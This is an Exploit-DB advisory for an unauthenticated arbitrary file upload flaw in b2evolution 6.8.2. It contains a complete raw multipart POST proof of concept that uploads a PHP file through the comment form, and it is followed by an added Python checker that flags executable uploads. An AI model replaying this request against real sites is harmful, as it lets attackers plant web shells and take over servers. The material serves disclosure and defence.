b2evolution 6.8.2 - Arbitrary File Upload

EDB-ID: 41011
CVE: N/A
Author: Li Fei
Type: webapps
Platform: PHP
Date: 2016-12-29


# Exploit Title: b2evolution 6.8.2 stable - Upload
# Date: 29/12/2016
# Exploit Author: Li Fei
# Vendor Homepage: http://b2evolution.net/
# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407
# Version: 6.8.2
# Tested on: win7 64bit

No admin access is needed to upload files, and any file type can be uploaded without any bypass (.php, .exe, ...).

1- Go to http://localhost/b2evolution/index.php/a/extended-post

2- Click on the Browse button and select your file

3- Click on Upload

The uploaded ceshi.php is then reachable at:

http://SiteName/ceshi.php

PoC URL:

POST /b2evolution/htsrv/comment_post.php HTTP/1.1

PoC header:

Host: localhost
Content-Length: 1054
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL
Referer: http://localhost/b2evolution/index.php/a/extended-post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ
Connection: close

------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_rating"


------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="g"


------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"
Content-Type: application/octet-stream

<?php
eval("echo'hello world';");
?>
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="submit_comment_post_19[save]"

Send comment
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="crumb_comment"

dXuthsKjMjhG2dnhADtzzOW414qV6Qky
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_type"

comment
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_item_ID"

19
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="redirect_to"

http://localhost/b2evolution/index.php/a/extended-post
------WebKitFormBoundarytZ4hUYCjABZB7YSL--
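Defensive counterpart, added here and not part of Li Fei's advisory or of b2evolution: a Python check that parses a multipart/form-data body of the shape shown in the PoC and flags file parts whose filename carries a server-executable extension in any segment (so shell.php.jpg is caught as well) or whose content opens with a PHP tag; an upload handler or WAF rule in front of comment_post.php should reject such requests before anything is written under the web root. The boundary and the sample body come from the PoC above; the denied-extension set is an assumed policy.

```python
import re

# Extensions the upload handler must never accept (assumed policy, not b2evolution's own list).
DENIED_EXTENSIONS = {"php", "php3", "php5", "phtml", "phar", "exe", "htaccess"}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

# Boundary and an abbreviated copy of the PoC body above, with CRLF line endings restored.
BOUNDARY = "----WebKitFormBoundarytZ4hUYCjABZB7YSL"
SAMPLE_BODY = (
    b"------WebKitFormBoundarytZ4hUYCjABZB7YSL\r\n"
    b'Content-Disposition: form-data; name="comment_rating"\r\n\r\n\r\n'
    b"------WebKitFormBoundarytZ4hUYCjABZB7YSL\r\n"
    b'Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"<?php\r\neval(\"echo'hello world';\");\r\n?>\r\n"
    b"------WebKitFormBoundarytZ4hUYCjABZB7YSL\r\n"
    b'Content-Disposition: form-data; name="comment_item_ID"\r\n\r\n19\r\n'
    b"------WebKitFormBoundarytZ4hUYCjABZB7YSL--\r\n"
)

def parse_multipart(body: bytes, boundary: str) -> list[dict]:
    """Split a multipart/form-data body into parts: name, filename (None for plain fields), data."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:        # [0] is the preamble before the first delimiter
        if chunk.startswith(b"--"):            # closing delimiter reached
            break
        chunk = chunk.lstrip(b"\r\n")          # line break that followed the delimiter
        m = re.search(rb"\r?\n\r?\n", chunk)   # blank line separates part headers from data
        if m is None:
            continue
        head = chunk[:m.start()].decode("latin-1")
        data = re.sub(rb"\r?\n\Z", b"", chunk[m.end():])  # drop the break before the next delimiter
        name = re.search(r';\s*name="([^"]*)"', head)       # "; name=" so "filename=" is not matched
        fname = re.search(r';\s*filename="([^"]*)"', head)
        parts.append({"name": name.group(1) if name else None,
                      "filename": fname.group(1) if fname else None, "data": data})
    return parts

def flag_dangerous_uploads(body: bytes, boundary: str) -> list[str]:
    """Return the basenames of file parts a comment-form upload handler should reject."""
    flagged = []
    for part in parse_multipart(body, boundary):
        if part["filename"] is None:
            continue                           # ordinary form field, not a file
        basename = part["filename"].replace("\\", "/").rsplit("/", 1)[-1]
        exts = {seg.lower() for seg in basename.split(".")[1:]}   # every segment, not just the last
        if exts & DENIED_EXTENSIONS or PHP_OPEN_TAG.search(part["data"]):
            flagged.append(basename)
    return flagged
```

Run against SAMPLE_BODY the check returns ['ceshi.php']; the same function applied to the real request body, before the file is stored, is the control the advisory shows to be missing.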